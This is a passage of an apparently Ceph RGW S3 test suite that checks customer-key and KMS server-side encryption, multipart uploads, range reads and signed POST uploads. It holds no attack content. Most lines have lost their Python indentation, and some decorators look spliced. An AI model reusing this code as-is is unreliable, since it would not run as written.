client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, data)
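# The fixed SSE-C header values used throughout these tests are a base64-encoded
# 256-bit key plus the base64-encoded MD5 digest of the raw key bytes. A minimal
# sketch of how such a header set could be generated (illustrative only; the
# tests deliberately reuse the constant values above so runs are reproducible):
def _generate_sse_c_headers_example():
    import base64
    import hashlib
    import os

    raw_key = os.urandom(32)  # 256-bit customer-provided key
    return {
        'x-amz-server-side-encryption-customer-algorithm': 'AES256',
        'x-amz-server-side-encryption-customer-key': base64.b64encode(raw_key).decode('ascii'),
        'x-amz-server-side-encryption-customer-key-md5': base64.b64encode(hashlib.md5(raw_key).digest()).decode('ascii'),
    }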
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 1 byte')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_1b():
_test_encryption_sse_customer_write(1)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 1KB')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_1kb():
_test_encryption_sse_customer_write(1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 1MB')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_1MB():
_test_encryption_sse_customer_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 13 bytes')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_13b():
_test_encryption_sse_customer_write(13)
@attr(resource='object')
@attr(method='head')
@attr(operation='Test SSE-C encrypted object HEAD requires the SSE-C headers')
@attr(assertion='success')
@attr('encryption')
def test_encryption_sse_c_method_head():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*1000
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
e = assert_raises(ClientError, client.head_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.HeadObject', lf)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-C and read without SSE-C')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_present():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*1000
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-C but read with other key')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_other_key():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers_A = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
sse_client_headers_B = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': '6b+WOZ1T3cqZMxgThRcXAQBrS5mXKdDUphvpxptl9/4=',
'x-amz-server-side-encryption-customer-key-md5': 'arxBvwY2V4SiOne6yppVPQ=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers_A))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers_B))
client.meta.events.register('before-call.s3.GetObject', lf)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-C, but md5 is bad')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_invalid_md5():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'AAAAAAAAAAAAAAAAAAAAAA=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation="write encrypted with SSE-C, but don't provide MD5")
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_no_md5():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
@attr(resource='object')
@attr(method='put')
@attr(operation='declare SSE-C but do not provide key')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_no_key():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
@attr(resource='object')
@attr(method='put')
@attr(operation='Do not declare SSE-C but provide key and MD5')
@attr(assertion='operation successful, no encryption')
@attr('encryption')
def test_encryption_key_no_sse_c():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
def _multipart_upload_enc(client, bucket_name, key, size, part_size, init_headers, part_headers, metadata, resend_parts):
"""
generate a multi-part upload for a random file of specifed size,
if requested, generate a list of the parts
return the upload descriptor
"""
    if client is None:
client = get_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update(init_headers))
client.meta.events.register('before-call.s3.CreateMultipartUpload', lf)
    if metadata is None:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
else:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key, Metadata=metadata)
upload_id = response['UploadId']
s = ''
parts = []
for i, part in enumerate(generate_random(size, part_size)):
# part_num is necessary because PartNumber for upload_part and in parts must start at 1 and i starts at 0
part_num = i+1
s += part
lf = (lambda **kwargs: kwargs['params']['headers'].update(part_headers))
client.meta.events.register('before-call.s3.UploadPart', lf)
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num})
if i in resend_parts:
lf = (lambda **kwargs: kwargs['params']['headers'].update(part_headers))
client.meta.events.register('before-call.s3.UploadPart', lf)
client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
return (upload_id, s, parts)
def _check_content_using_range_enc(client, bucket_name, key, data, step, enc_headers=None):
response = client.get_object(Bucket=bucket_name, Key=key)
size = response['ContentLength']
for ofs in range(0, size, step):
toread = size - ofs
if toread > step:
toread = step
end = ofs + toread - 1
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
r = 'bytes={s}-{e}'.format(s=ofs, e=end)
response = client.get_object(Bucket=bucket_name, Key=key, Range=r)
read_range = response['ContentLength']
body = _get_body(response)
eq(read_range, toread)
eq(body, data[ofs:end+1])
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload')
@attr(assertion='successful')
@attr('encryption')
@attr('fails_on_aws')
def test_encryption_sse_c_multipart_upload():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
enc_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
resend_parts = []
(upload_id, data, parts) = _multipart_upload_enc(client, bucket_name, key, objlen,
part_size=5*1024*1024, init_headers=enc_headers, part_headers=enc_headers, metadata=metadata, resend_parts=resend_parts)
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.CompleteMultipartUpload', lf)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
eq(rgw_bytes_used, objlen)
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['Metadata'], metadata)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], content_type)
body = _get_body(response)
eq(body, data)
size = response['ContentLength']
eq(len(body), size)
_check_content_using_range_enc(client, bucket_name, key, data, 1000000, enc_headers=enc_headers)
_check_content_using_range_enc(client, bucket_name, key, data, 10000000, enc_headers=enc_headers)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart upload with bad key for uploading chunks')
@attr(assertion='fails 400')
@attr('encryption')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_encryption_sse_c_multipart_invalid_chunks_1():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': '6b+WOZ1T3cqZMxgThRcXAQBrS5mXKdDUphvpxptl9/4=',
'x-amz-server-side-encryption-customer-key-md5': 'arxBvwY2V4SiOne6yppVPQ=='
}
resend_parts = []
e = assert_raises(ClientError, _multipart_upload_enc, client=client, bucket_name=bucket_name,
key=key, size=objlen, part_size=5*1024*1024, init_headers=init_headers, part_headers=part_headers, metadata=metadata, resend_parts=resend_parts)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart upload with bad md5 for chunks')
@attr(assertion='fails 400')
@attr('encryption')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_encryption_sse_c_multipart_invalid_chunks_2():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'AAAAAAAAAAAAAAAAAAAAAA=='
}
resend_parts = []
e = assert_raises(ClientError, _multipart_upload_enc, client=client, bucket_name=bucket_name,
key=key, size=objlen, part_size=5*1024*1024, init_headers=init_headers, part_headers=part_headers, metadata=metadata, resend_parts=resend_parts)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload and download with bad key')
@attr(assertion='successful')
@attr('encryption')
def test_encryption_sse_c_multipart_bad_download():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
put_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
get_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': '6b+WOZ1T3cqZMxgThRcXAQBrS5mXKdDUphvpxptl9/4=',
'x-amz-server-side-encryption-customer-key-md5': 'arxBvwY2V4SiOne6yppVPQ=='
}
resend_parts = []
(upload_id, data, parts) = _multipart_upload_enc(client, bucket_name, key, objlen,
part_size=5*1024*1024, init_headers=put_headers, part_headers=put_headers, metadata=metadata, resend_parts=resend_parts)
lf = (lambda **kwargs: kwargs['params']['headers'].update(put_headers))
client.meta.events.register('before-call.s3.CompleteMultipartUpload', lf)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
eq(rgw_bytes_used, objlen)
lf = (lambda **kwargs: kwargs['params']['headers'].update(put_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['Metadata'], metadata)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], content_type)
lf = (lambda **kwargs: kwargs['params']['headers'].update(get_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
@attr('encryption')
def test_encryption_sse_c_post_object_authenticated_request():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["starts-with", "$x-amz-server-side-encryption-customer-algorithm", ""], \
["starts-with", "$x-amz-server-side-encryption-customer-key", ""], \
["starts-with", "$x-amz-server-side-encryption-customer-key-md5", ""], \
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),
('x-amz-server-side-encryption-customer-algorithm', 'AES256'), \
('x-amz-server-side-encryption-customer-key', 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs='), \
('x-amz-server-side-encryption-customer-key-md5', 'DWygnHRtgiJ77HCm+1rvHw=='), \
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
get_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(get_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
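# The base64-policy + HMAC-SHA1 signing block above is repeated by several POST
# upload tests in this file. A minimal sketch of the same steps wrapped in one
# helper (illustrative only; not wired into the tests):
def _sign_post_policy_example(policy_document, secret_key):
    import base64
    import hashlib
    import hmac
    import json

    policy = base64.b64encode(json.dumps(policy_document).encode('utf-8'))
    signature = base64.b64encode(hmac.new(secret_key.encode('utf-8'), policy, hashlib.sha1).digest())
    return policy, signature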
@attr(assertion='success')
@attr('encryption')
def _test_sse_kms_customer_write(file_size, key_id = 'testkey-1'):
"""
Tests Create a file of A's, use it to set_contents_from_file.
Create a file of B's, use it to re-set_contents_from_file.
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': key_id
}
data = 'A'*file_size
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key='testobj', Body=data)
response = client.get_object(Bucket=bucket_name, Key='testobj')
body = _get_body(response)
eq(body, data)
@attr(resource='object')
@attr(method='head')
@attr(operation='Test SSE-KMS encrypted object performs head properly')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_method_head():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid
}
data = 'A'*1000
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-server-side-encryption'], 'aws:kms')
eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-server-side-encryption-aws-kms-key-id'], kms_keyid)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.HeadObject', lf)
e = assert_raises(ClientError, client.head_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-KMS and read without SSE-KMS')
@attr(assertion='operation success')
@attr('encryption')
def test_sse_kms_present():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid
}
data = 'A'*100
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, data)
@attr(resource='object')
@attr(method='put')
@attr(operation='declare SSE-KMS but do not provide key_id')
@attr(assertion='operation fails')
@attr('encryption')
def test_sse_kms_no_key():
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
}
data = 'A'*100
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
@attr(resource='object')
@attr(method='put')
@attr(operation='Do not declare SSE-KMS but provide key_id')
@attr(assertion='operation successful, no encryption')
@attr('encryption')
def test_sse_kms_not_declared():
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption-aws-kms-key-id': 'testkey-2'
}
data = 'A'*100
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='complete KMS multi-part upload')
@attr(assertion='successful')
@attr('encryption')
def test_sse_kms_multipart_upload():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
enc_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid,
'Content-Type': content_type
}
resend_parts = []
(upload_id, data, parts) = _multipart_upload_enc(client, bucket_name, key, objlen,
part_size=5*1024*1024, init_headers=enc_headers, part_headers=enc_headers, metadata=metadata, resend_parts=resend_parts)
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.CompleteMultipartUpload', lf)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
eq(rgw_bytes_used, objlen)
    # SSE-KMS reads do not require any extra request headers, so the object
    # can be fetched directly (see test_sse_kms_present above)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['Metadata'], metadata)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], content_type)
body = _get_body(response)
eq(body, data)
size = response['ContentLength']
eq(len(body), size)
_check_content_using_range(key, bucket_name, data, 1000000)
_check_content_using_range(key, bucket_name, data, 10000000)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart KMS upload with bad key_id for uploading chunks')
@attr(assertion='successful')
@attr('encryption')
def test_sse_kms_multipart_invalid_chunks_1():
kms_keyid = get_main_kms_keyid()
kms_keyid2 = get_secondary_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/bla'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid,
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid2
}
resend_parts = []
_multipart_upload_enc(client, bucket_name, key, objlen, part_size=5*1024*1024,
init_headers=init_headers, part_headers=part_headers, metadata=metadata,
resend_parts=resend_parts)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart KMS upload with nonexistent key_id for chunks')
@attr(assertion='successful')
@attr('encryption')
def test_sse_kms_multipart_invalid_chunks_2():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid,
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': 'testkey-not-present'
}
resend_parts = []
_multipart_upload_enc(client, bucket_name, key, objlen, part_size=5*1024*1024,
init_headers=init_headers, part_headers=part_headers, metadata=metadata,
resend_parts=resend_parts)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated KMS browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
@attr('encryption')
def test_sse_kms_post_object_authenticated_request():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["starts-with", "$x-amz-server-side-encryption", ""], \
["starts-with", "$x-amz-server-side-encryption-aws-kms-key-id", ""], \
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),
('x-amz-server-side-encryption', 'aws:kms'), \
('x-amz-server-side-encryption-aws-kms-key-id', kms_keyid), \
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 1 byte')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_1b():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(1, key_id = kms_keyid)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 1KB')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_1kb():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(1024, key_id = kms_keyid)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 1MB')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_1MB():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(1024*1024, key_id = kms_keyid)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 13 bytes')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_13b():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(13, key_id = kms_keyid)
@attr(resource='object')
@attr(method='get')
@attr(operation='read an unencrypted object while declaring SSE-KMS')
@attr(assertion='operation fails')
@attr('encryption')
def test_sse_kms_read_declare():
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': 'testkey-1'
}
data = 'A'*100
key = 'testobj'
client.put_object(Bucket=bucket_name, Key=key, Body=data)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy')
@attr(assertion='succeeds')
@attr('bucket-policy')
def test_bucket_policy():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
